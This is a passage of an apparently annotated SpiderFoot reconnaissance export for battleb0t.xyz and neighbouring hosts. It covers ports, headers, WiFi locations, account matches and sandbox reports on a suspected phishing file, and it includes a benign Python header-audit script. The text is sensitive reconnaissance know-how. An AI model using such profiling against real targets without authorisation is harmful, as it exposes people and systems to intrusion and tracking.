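The SCT timestamps sit one hour after Not Before; that is Let's Encrypt backdating notBefore by an hour to absorb client clock skew, not a sign of tampering. The useful check is the one the status line gives: a CT record proves a certificate for the name existed at some point, and only a live handshake against the host tells you what it serves now.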
| 2023-05-12 02:54:38 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | San Francisco, California, 94107, United States, North America | 172.67.168.252 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpa (Net ID: 00:06:25:3B:8E:36) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery 5G (Net ID: 00:01:9F:3D:4F:6C) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00lt00.github.io | 185.199.111.153 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.113): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.108.153 | battleb0t.xyz |
| 2023-05-12 03:18:46 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_1.jpg |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 35.229.48.0/20 |
| 2023-05-12 02:53:39 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 9954:9C3B:20A7B64:2F7931C:645C5074
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 259
X-Served-By: cache-chi-klot8100161-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683771768.574276,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: 8a09b57cb5993eaa6860d607d298dd9826aef348
| 185.199.108.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | setlist.fm (Category: music)
https://www.setlist.fm/user/login | login |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:80 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MHeckmans (Net ID: 00:02:CF:CB:87:99) | 50.8897, 6.0563 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:44:12 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | CN=*.cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.202): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8443 | 104.21.6.166 |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:8080 | 188.114.97.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Search engine optimization metrics - A number of metrics are available to marketers interested in search engine optimization. Search engines and software creating such metrics all use their own crawled data to derive at a numeric conclusion on a website's organic search potential. | baffin.netcraft.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | xHamster (Category: XXXPORNXXX)
https://xhamster.com/users/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | monks56 (Net ID: 00:06:25:C3:88:45) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:97:C1) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:25 | Username | No | Social Network Identifier | 43 | 0 | 4 | 0 | None | Altpapier | https://github.com/Altpapier/SkyHelperAPI/issues |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.49): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
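HTTP headers appear in this scan in three shapes: the spider's JSON object with lower-case names (the records flagged as Non-Standard HTTP Header and the HTTP Headers record for fluid.battleb0t.xyz), Censys's normalised form with underscored names, list values and an `_encoding` map (the record just above), and the raw banner captured on 185.199.108.153. The "non-standard" label is only SpiderFoot's word for a header name it does not recognise; `nel` and `cross-origin-embedder-policy` are standard hardening headers, and what matters is which of them each response carries. The Python below is an added example, not SpiderFoot's code: it normalises all three shapes, lists the hardening headers present and missing, parses the NEL policy, and treats `cf-mitigated: challenge` as the signal that the body is an interstitial rather than the origin's content.

```python
import json

# Three header records from this scan, in the shapes the export uses.
# (1) Spider JSON for the ayhu.xyz challenge response (trimmed to the relevant keys).
SPIDER_JSON = r'''{"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "cross-origin-resource-policy": "same-origin", "server": "cloudflare", "cf-mitigated": "challenge", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"}'''
# (2) Censys normalised form for 172.67.168.252 (the record above this example).
CENSYS_JSON = r'''{"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]}'''
# (3) Raw banner from 185.199.108.153 (GitHub Pages), trimmed.
BANNER_TEXT = """HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
X-Cache: HIT
Vary: Accept-Encoding
"""

# Headers whose presence is worth reporting, with a short label for each.
HARDENING = {
    "content-security-policy": "CSP",
    "strict-transport-security": "HSTS",
    "x-frame-options": "clickjacking",
    "x-content-type-options": "nosniff",
    "referrer-policy": "referrer",
    "cross-origin-opener-policy": "COOP",
    "cross-origin-embedder-policy": "COEP",
    "cross-origin-resource-policy": "CORP",
}


def normalise_headers(record):
    """Return {lower-case-hyphenated-name: value} from a raw banner, spider JSON or Censys JSON."""
    if isinstance(record, str) and record.lstrip().startswith("HTTP/"):
        headers = {}
        for line in record.splitlines()[1:]:  # skip the status line
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        return headers
    data = json.loads(record) if isinstance(record, str) else record
    headers = {}
    for name, value in data.items():
        if name == "_encoding":  # Censys bookkeeping, not a header
            continue
        if isinstance(value, list):  # Censys stores every header as a list of values
            value = ", ".join(value)
        # Censys replaces '-' with '_' in names; real header names do not contain '_'.
        headers[name.lower().replace("_", "-")] = value
    return headers


def audit(record):
    """Summarise hardening headers, NEL policy and interstitial status for one record."""
    h = normalise_headers(record)
    result = {
        "server": h.get("server"),
        "present": sorted(n for n in HARDENING if n in h),
        "missing": sorted(n for n in HARDENING if n not in h),
        "interstitial": h.get("cf-mitigated") == "challenge",
        "nel": None,
    }
    if "nel" in h:
        nel = json.loads(h["nel"])  # the header value is itself a JSON document
        result["nel"] = {
            "group": nel.get("report_to"),
            "max_age_days": nel.get("max_age", 0) // 86400,
            "success_fraction": nel.get("success_fraction"),
        }
    return result


if __name__ == "__main__":
    for label, record in (("spider", SPIDER_JSON), ("censys", CENSYS_JSON), ("banner", BANNER_TEXT)):
        print(label, json.dumps(audit(record), indent=1))
```

Read the result for the spider record with its `interstitial` flag in mind: COOP, COEP, CORP and X-Frame-Options there describe Cloudflare's challenge page, not ayhu.xyz, so they say nothing about the origin's posture. The Censys record shows the same edge answering a bare-IP request with no hardening headers at all, and the GitHub Pages banner shows a CSP on a 404 that is GitHub's default, not the co-hosted site's choice; header findings on shared infrastructure belong to the fronting service until a request carries the right Host and passes the challenge.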
| 2023-05-12 02:53:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.153:443 | 185.199.111.0/24 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.110.153 |
| 2023-05-12 02:47:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 8, u'threat_score': 80, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://zaratec.io/assets/img/favicons/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "AcroRd32.exe" (UID: 00000000-00003900) was launched with modified environment variables: "PATH"\n Process "RdrCEF.exe" (UID: 00000000-00001728) was launched with modified environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." 
(UID: 00000000-00001724)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003900)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003152)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /assets/img/favicons/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zaratec.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/img/favicons/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zaratec.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_718_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\LRIEElevationPolicyMutex"\n "IsoScope_718_IE_EarlyTabStart_0x66c_Mutex"\n "IsoScope_718_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_718_ConnHashTable<1816>_HashTable_Mutex"\n 
"IsoScope_718_IESQMMUTEX_0_303"\n "IsoScope_718_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1816"\n "Local\\VERMGMTBlockListFileMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "SmartScreen_ClientId_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "CommunicationManager_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "rundll32.exe" with commandline "%WINDIR%\\system32\\shell32.dll,OpenAs_RunDLL %USERPROFILE%\\Downlo ..." (UID: 00000000-00001724)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003900)\n Spawned process "AcroRd32.exe" with commandline ""%USERPROFILE%\\Downloads\\site.webmanifest"" (UID: 00000000-00003152)\n Spawned process "RdrCEF.exe" with commandline "--backgroundcolor=16448250" (UID: 00000000-00001728)\n Spawned process "RdrCEF.exe" with commandline "--type=renderer --primordial-pipe-token=7BEE27BC222632A4E79EAB52 ..." 
(UID: 00000000-00002344)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar889D.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar884D.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1546/015', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1546.015', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" touched "UsersFiles" (Path: "HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "rundll32.exe" touched "Adobe Acrobat Document" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B801CA65-A1FC-11D0-85AD-444553540000}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "rundll32.exe" touched "Enhanced Storage Icon Overlay Handler Class" (Path: "HKCU\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 1 (GFS Unread Stub)" (Path: "HKCU\\CLSID\\{99FD978C-D287-4F50-827F-B2C658EDA8E7}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{920E6DB1-9907-4370-B3A0-BAFC03D81399}\\PROGID")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 2 (GFS Stub)" (Path: "HKCU\\CLSID\\{AB5C5600-7E6E-4B06-9197-9ECEF74D31CC}\\INPROCSERVER32")\n "rundll32.exe" touched 
"Groove Explorer Icon Overlay 4 (GFS Unread Mark)" (Path: "HKCU\\CLSID\\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC}\\INPROCSERVER32")\n "rundll32.exe" touched "Groove Explorer Icon Overlay 3 (GFS Folder)" (Path: "HKCU\\CLSID\\{16F3DD56-1AF5-4347-846D-7C10C4192619}\\INPROCSERVER32")\n "rundll32.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")\n "rundll32.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "rundll32.exe" touched "Start Menu Cache" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\INPROCHANDLER")\n "rundll32.exe" touched "Start Menu Pin" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\INPROCSERVER32")\n "rundll32.exe" touched "Taskband Pin" (Path: "HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS")\n "rundll32.exe" touched "Shortcut" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "Internet Shortcut" (Path: "HKCU\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "rundll32.exe" touched "User Pinned" (Path: "HKCU\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\SHELLFOLDER")\n "rundll32.exe" touched "Shell File System Folder" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\\INPROCSERVER32")\n "rundll32.exe" touched "User Assist" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\PROGID")\n "rundll32.exe" touched "Shared Task Scheduler" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab889C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab884C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-25', u'name': u'Reads information about supported languages', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE"; Key: "EN-US")\n "rundll32.exe" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE"; Key: "00000409")\n "rundll32.exe" ( | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3019fc (Net ID: 00:02:2D:30:19:FC) | 37.7642, -122.3993 |
| 2023-05-12 02:47:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'VoiceMailMemo950.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC81A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "207.241.228.150:443"\n "13.227.74.44:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"getbootstrap.com"\n "ia801500.us.archive.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 
u'"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_e88_IESQMMUTEX_0_519"\n "IsoScope_e88_IESQMMUTEX_0_331"\n "IsoScope_e88_IE_EarlyTabStart_0xcf0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e88_ConnHashTable<3720>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3720"\n "IsoScope_e88_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e88_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: 
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /docs/5.2/examples/sign-in/signin.css HTTP/1.1\nAccept: text/css, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: getbootstrap.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET 